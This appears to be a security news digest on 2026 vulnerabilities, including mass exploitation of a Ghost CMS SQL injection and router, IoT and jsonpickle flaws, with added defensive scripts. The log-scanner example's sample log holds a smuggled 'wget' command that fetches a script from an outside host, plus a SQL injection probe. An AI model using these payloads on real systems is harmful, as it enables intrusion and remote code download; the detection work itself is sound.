What you need to know today.
Ghost CMS SQL injection exploited at scale against 700+ sites, as a wave of critical unauthenticated RCEs hits backup appliances and IoT devices.

Ghost CMS SQL injection under active mass exploitation — 700+ sites poisoned with ClickFix malware. CVE-2026-26980 is a critical unauthenticated SQL injection in Ghost CMS versions 3.24.0 through 6.19.0 that allows arbitrary database reads. As BleepingComputer reported, attackers are exploiting it in a large-scale campaign that has compromised over 700 websites, injecting malicious JavaScript that serves ClickFix-style social-engineering payloads. The Hacker News noted that the campaign uses the SQLi to extract admin credentials and session tokens, then uploads backdoor files to maintain persistence. Ghost released a fix in version 6.19.1, but the scale of exploitation — combined with the availability of public PoC code — makes this an emergency-patch situation for any instance still running an affected version. SecurityWeek and Cyber Security News also covered the campaign.
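As an added triage check (not Ghost's own code), the following Python compares an install's reported version against the affected range given above. It assumes the version is read from the package.json that ghost-cli keeps under current/ in the install directory (or a bare package.json for a source checkout), and it conservatively treats any pre-release build below 6.19.1 as affected, since such a build predates the fix release.

```python
"""Flag Ghost installs in the CVE-2026-26980 affected range (added example).

Assumptions: the version string comes from package.json (ghost-cli keeps the
running release under <install>/current/package.json); the range is the one
stated in the advisory summary, 3.24.0 through 6.19.0, with 6.19.1 fixed.
"""
import json
import re
from pathlib import Path

AFFECTED_MIN = (3, 24, 0, 1)   # 3.24.0 final release
FIXED = (6, 19, 1, 1)          # 6.19.1 final release; anything in [MIN, FIXED) is flagged

# major.minor.patch with optional pre-release and build suffixes (e.g. 6.19.1-beta.2+build.7)
_SEMVER = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)(?:-([0-9A-Za-z.-]+))?(?:\+[0-9A-Za-z.-]+)?$")


def parse_version(text: str) -> tuple[int, int, int, int]:
    """Return (major, minor, patch, release) where release is 0 for a
    pre-release and 1 for a final build, so 6.19.1-beta.2 sorts below 6.19.1."""
    m = _SEMVER.match(text.strip())
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, patch, pre = m.groups()
    return (int(major), int(minor), int(patch), 0 if pre else 1)


def is_affected(version: str) -> bool:
    """True for 3.24.0 <= version < 6.19.1; a 6.19.1 pre-release is flagged
    because it was cut before the fix release."""
    return AFFECTED_MIN <= parse_version(version) < FIXED


def classify_package_json(text: str) -> dict:
    """Classify the version field of a package.json document."""
    version = json.loads(text)["version"]
    return {"version": version, "affected": is_affected(version), "fixed_in": "6.19.1"}


def check_install(install_dir: str) -> dict:
    """Locate package.json for a ghost-cli layout (current/) or a bare checkout."""
    root = Path(install_dir)
    for candidate in (root / "current" / "package.json", root / "package.json"):
        if candidate.is_file():
            return classify_package_json(candidate.read_text())
    raise FileNotFoundError(f"no package.json under {install_dir}")


if __name__ == "__main__":
    import sys
    # Default path is an assumption; pass the real install directory as argv[1].
    print(check_install(sys.argv[1] if len(sys.argv) > 1 else "/var/www/ghost"))
```

Run it on each host as the Ghost service user; an "affected": true result means the instance needs 6.19.1 before anything else on the day's list, and its database credentials and admin sessions should be treated as exposed until the exploitation indicators in the reports above have been ruled out.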
A wave of critical unauthenticated RCEs hits backup appliances, logistics software, and IoT devices. Arcserve Unified Data Protection (UDP) carries CVE-2025-34523, a CVSS 9.8 heap-based buffer overflow in its network-facing input handling; it is reachable without authentication and likely wormable on internal networks where UDP backup appliances are deployed. Dongsheng Logistics Software (CVE-2025-34163) exposes an unauthenticated file-upload endpoint at /CommMng/Print/UploadMailFile that lets attackers upload arbitrary executable scripts. On the IoT front, the WDR201A WiFi Extender (CVE-2026-41922) contains an unauthenticated OS command injection in wireless.cgi, and multiple D-Link DSL/DIR/DNS devices (CVE-2026-0625) have an authentication bypass in the dnscfg.cgi endpoint. All four are exploitable over the network with no credentials, so they should be prioritized for patching, or for network segmentation and isolation of the management interface where no patch is available yet.
Old vulnerabilities resurface with high EPSS scores, indicating active or imminent scanning. Several CVEs from 2012–2013 are seeing renewed attention. CVE-2012-10060 (Sysax Multi Server SSH buffer overflow, CVSS 9.8, EPSS 0.69) allows pre-authentication RCE via an overly long username. CVE-2012-10047 (Cyclope Employee Surveillance SQL injection, EPSS 0.53) bypasses login entirely. CVE-2013-10068 (Foxit Reader plugin stack overflow, EPSS 0.59) triggers when a victim opens a malicious PDF. CVE-2012-10027 (WordPress WP-Property plugin unauthenticated file upload, EPSS 0.74) enables full server compromise. These are not new disclosures — they are old flaws that threat actors are rediscovering and weaponizing, likely because many organizations never patched them. The WP-Property plugin CVE is especially concerning given WordPress's massive install base and the plugin's continued use on legacy sites.
Multiple authenticated command-injection and RCE flaws in routers, management platforms, and ML tooling. CVE-2013-10050 affects D-Link DIR-300 and DIR-615 routers via the tools_vct.xgi CGI endpoint — authenticated but trivial to exploit once credentials are obtained. CVE-2020-37002 in Ajenti 2.1.36 allows post-auth RCE via the /api/terminal/create endpoint. CVE-2026-31217 in the optimate ML project (Nebuly AI) allows arbitrary code execution when loading a model from a user-supplied path. CVE-2026-22189 in Panda3D's egg-mkfont utility contains a stack buffer overflow from unbounded sprintf() calls. While these require some level of access or user interaction, their CVSS scores (8.8–9.8) reflect the full impact once triggered. The D-Link router flaws are particularly relevant for small-office environments where default credentials remain common.
Supply-chain and dependency risks: jsonpickle RCE, cors-anywhere SSRF, and an unsandboxed Lua interpreter. CVE-2021-47952 in python jsonpickle 2.0.0 allows RCE via deserialization of malicious JSON containing py/repr objects — a classic pickle-style attack that affects any application deserializing untrusted JSON with this library. CVE-2020-36851 in Rob--W cors-anywhere turns instances configured as open proxies into SSRF vectors, enabling attackers to reach internal networks. CVE-2026-22208 in OpenS100 (the S-100 maritime chart viewer) contains an unrestricted Lua interpreter that allows full RCE. These are harder to inventory but equally dangerous — security teams should audit their dependency trees for jsonpickle and cors-anywhere usage, and check for any OpenS100 deployments in maritime or geospatial contexts.
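The jsonpickle issue above is the familiar "deserializer that honours type tags in attacker data" problem, so the practical control is to refuse such tags before the document ever reaches a decoder. The following Python is an added example, not jsonpickle's own code: it parses untrusted input with the standard json module and rejects any document carrying the py/ control keys that jsonpickle interprets on decode. The sample documents are constructed for the example, and the py/repr value shown is a placeholder, not a working payload.

```python
"""Reject untrusted JSON that carries jsonpickle control tags (added example).

jsonpickle reconstructs Python objects from documents containing "py/..." keys;
the tags below are the ones whose handling can import modules, call
constructors or evaluate strings during decode. The check runs before any
jsonpickle.decode call and needs only the standard library.
"""
import json

# Tags whose handling can import modules or execute code during decode.
CODE_EXEC_TAGS = frozenset({"py/object", "py/reduce", "py/function", "py/repr", "py/type", "py/newargs"})
# Remaining jsonpickle tags; harmless alone but rarely legitimate in user input.
STRUCTURAL_TAGS = frozenset({"py/state", "py/id", "py/ref", "py/tuple", "py/set", "py/b64", "py/bytes", "py/seq"})


class UnsafeDocument(ValueError):
    """Raised when a document carries disallowed py/ tags."""


def find_pickle_tags(node, path="$"):
    """Walk a parsed JSON tree; return (json_path, tag) for every py/ key found."""
    hits = []
    if isinstance(node, dict):
        for key, value in node.items():
            if key.startswith("py/"):
                hits.append((path, key))
            hits.extend(find_pickle_tags(value, f"{path}.{key}"))
    elif isinstance(node, list):
        for i, value in enumerate(node):
            hits.extend(find_pickle_tags(value, f"{path}[{i}]"))
    return hits


def load_untrusted(text, allow_tags=frozenset()):
    """Parse with json.loads and refuse the document if it carries any py/ tag
    not in allow_tags. The default refuses every tag, which is right for input
    that is only ever supposed to be plain data."""
    doc = json.loads(text)
    bad = [(p, t) for p, t in find_pickle_tags(doc) if t not in allow_tags]
    if bad:
        kind = "code-execution" if any(t in CODE_EXEC_TAGS for _, t in bad) else "pickle"
        detail = "; ".join(f"{t} at {p}" for p, t in bad)
        raise UnsafeDocument(f"{kind} tags present: {detail}")
    return doc


def is_safe(text):
    """Convenience wrapper for filters that only need a verdict."""
    try:
        load_untrusted(text)
        return True
    except UnsafeDocument:
        return False


# Constructed samples: a plain profile, and the same document with a py/repr
# tag smuggled into a nested list. The tag value is a placeholder, not a payload.
BENIGN = '{"user": "alice", "prefs": {"theme": "dark", "py_version": 3}}'
MALICIOUS = '{"user": "alice", "prefs": [{"theme": "dark"}, {"py/repr": "<attacker-controlled>"}]}'

if __name__ == "__main__":
    for sample in (BENIGN, MALICIOUS):
        print(is_safe(sample), find_pickle_tags(json.loads(sample)))
```

Put the check at the trust boundary (the request handler or message consumer), not next to the decode call, so that a later refactor cannot route raw input around it. Recent jsonpickle releases also accept safe=True on decode, which disables the repr-based path; treat that as a second layer rather than the only one, because the object, reduce and function tags remain powerful.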
Ilevia EVE X1/X5 server and multiple Chinese healthcare/logistics systems expose critical unauthenticated flaws. CVE-2025-34186 in Ilevia EVE X1/X5 Server (≤ 4.7.18.0.eden) passes unsanitized input to a system() call during authentication, enabling unauthenticated command injection. CVE-2025-34162 in the Bian Que Feijiu Intelligent Emergency and Quality Control System (Wooluo) has an unauthenticated SQL injection in its GetLyfsByParams endpoint. CVE-2026-31216 in nexent v1.7.5.2 allows unauthenticated arbitrary file deletion via its storage API. These systems are deployed in logistics, healthcare, and building-management contexts where patching cycles are slow and network segmentation is often absent. The Ilevia flaw is especially dangerous because the command injection occurs during the authentication handshake itself — before any access control is enforced.
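Several of the flaws in this digest are tied to a named web endpoint (UploadMailFile, wireless.cgi, dnscfg.cgi, tools_vct.xgi, /api/terminal/create and GetLyfsByParams across the backup/IoT, router/management and healthcare paragraphs above), which makes a first-pass hunt in web access logs cheap. The following Python is an added detection example, not vendor code: it parses combined-format access logs and flags requests to those paths, demanding a shell or SQL payload hint in the URL-decoded query for the injection flaws unless the request is a POST, whose body never reaches the access log. The log lines are constructed for the example, and the parameter names in them are illustrative; only the endpoint paths come from the advisories.

```python
"""Flag access-log hits against the endpoints named in this digest (added
example). Log lines are constructed; parameter names are illustrative and only
the endpoint paths come from the advisories."""
import re
from urllib.parse import unquote_plus, urlsplit

# Apache/nginx combined log: client, ident, user, [time], "METHOD target proto", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

# Hints that a query string carries a shell or SQL payload (checked after URL-decoding).
SHELL_META = re.compile(r"[;|`&]|\$\(")
SQLI_HINT = re.compile(r"'|--|\bunion\b|\bsleep\s*\(|\bor\b\s+\d+\s*=\s*\d+", re.I)

# (cve, description, path pattern, payload hint or None). A None hint means any
# request to the path is worth a look: the endpoint should not be reachable by
# arbitrary clients at all.
RULES = [
    ("CVE-2025-34163", "Dongsheng Logistics unauthenticated upload", re.compile(r"/CommMng/Print/UploadMailFile$", re.I), None),
    ("CVE-2026-41922", "WDR201A wireless.cgi command injection", re.compile(r"/wireless\.cgi$", re.I), SHELL_META),
    ("CVE-2026-0625", "D-Link dnscfg.cgi authentication bypass", re.compile(r"/dnscfg\.cgi$", re.I), None),
    ("CVE-2013-10050", "D-Link tools_vct.xgi command injection", re.compile(r"/tools_vct\.xgi$", re.I), SHELL_META),
    ("CVE-2020-37002", "Ajenti /api/terminal/create post-auth RCE", re.compile(r"/api/terminal/create$", re.I), None),
    ("CVE-2025-34162", "Bian Que Feijiu GetLyfsByParams SQL injection", re.compile(r"/GetLyfsByParams$", re.I), SQLI_HINT),
]


def scan_line(line):
    """Return a hit dict for the first matching rule, or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m["target"])
    path, query = unquote_plus(parts.path), unquote_plus(parts.query)
    for cve, desc, path_re, hint_re in RULES:
        if not path_re.search(path):
            continue
        # Injection flaws need a payload hint in the query, unless the request
        # is a POST: its body, where the payload would sit, is not logged.
        if hint_re is not None and m["method"] != "POST" and not hint_re.search(query):
            continue
        return {"cve": cve, "desc": desc, "ip": m["ip"], "time": m["ts"],
                "method": m["method"], "status": int(m["status"]), "target": m["target"]}
    return None


def scan_log(lines):
    """Scan an iterable of log lines and return every hit in order."""
    return [hit for hit in map(scan_line, lines) if hit]


# Constructed sample log: one upload, one injected and one benign wireless.cgi
# request, one dnscfg.cgi call, one sqlmap-style probe and one ordinary page view.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:02:14:05 +0000] "POST /CommMng/Print/UploadMailFile HTTP/1.1" 200 512 "-" "python-requests/2.31"
198.51.100.2 - - [10/Mar/2026:02:15:41 +0000] "GET /wireless.cgi?ssid=test%3Bwget+http%3A%2F%2F198.51.100.2%2Fx.sh HTTP/1.1" 200 0 "-" "curl/8.1"
198.51.100.2 - - [10/Mar/2026:02:15:42 +0000] "GET /wireless.cgi?ssid=HomeNet HTTP/1.1" 200 0 "-" "Mozilla/5.0"
192.0.2.9 - - [10/Mar/2026:02:16:00 +0000] "GET /dnscfg.cgi?dnsPrimary=192.0.2.9 HTTP/1.1" 200 120 "-" "curl/8.1"
192.0.2.9 - - [10/Mar/2026:02:16:30 +0000] "GET /api/GetLyfsByParams?code=1%27+UNION+SELECT+1%2C2-- HTTP/1.1" 500 0 "-" "sqlmap/1.8"
10.0.0.5 - - [10/Mar/2026:02:17:00 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{hit['time']} {hit['ip']} {hit['cve']} {hit['method']} {hit['target']}")
```

A hit is a lead, not a verdict: a 200 on UploadMailFile from an unknown client is worth a file-system look for new scripts, and a POST to a CGI endpoint only says the path was touched. The endpoints that can execute commands or take over the device should not be exposed to arbitrary networks at all, so any hit from outside the expected management range is the finding, whatever the payload looked like.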